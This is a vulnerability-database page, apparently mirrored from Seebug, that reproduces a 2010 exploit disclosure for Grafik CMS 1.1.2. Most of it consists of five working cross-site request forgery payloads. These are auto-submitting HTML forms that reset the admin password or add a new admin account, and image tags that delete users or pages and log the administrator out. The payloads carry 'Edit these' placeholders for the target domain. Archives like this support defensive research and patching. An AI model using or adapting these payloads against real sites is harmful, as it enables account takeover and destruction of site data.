Lucene search
K

Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities - Change Admin Password, Create Admin User, Delete User, Delete Page, Logout The Administrato

Code

                                                <!---
    Title: Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Mon 12 Jul 2010 07:07:22 PM EEST 
    Vendor: http://www.grafik-power.com/grafik_cms/
    Download: None
--->

-=[ CSRF PoC 1 - Change Admin Password ]=-

    <html>
        <head>
            <title>Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities - Change Admin Password</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/admin/admin.php?action=edit_user&id=1" method="post">
                <!--- Edit these --->
                <input type="hidden" name="name" value="root" />
                <input type="hidden" name="username" value="root" />
                <input type="hidden" name="password" value="rootroot" />
            </form>
        </body>
    </html>
    
-=[ CSRF PoC 2 - Create Admin User ]=-
    
    <html>
        <head>
            <title>Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities - Create Admin User</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/admin/admin.php?action=add_user" method="post">
                <!--- Edit these --->
                <input type="hidden" name="name" value="root" />
                <input type="hidden" name="username" value="root" />
                <input type="hidden" name="password" value="rootroot" />
            </form>
        </body>
    </html>
 
-=[ CSRF PoC 3 - Delete User ]=-

     <img src="http://[domain]/admin/admin.php?action=liste_user&del=[user id]" alt="Do you see this?" />
     
-=[ CSRF PoC 4 - Delete Page ]=-

     <img src="http://[domain]/admin/admin.php?action=liste_pages&del=[page id]" alt="Do you see this?" />
     
-=[ CSRF PoC 5 - Logout The Administrator ]=-

    <img src="http://[domain]/admin/index.php?action=deconnexion" alt="Do you see this?" />

<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation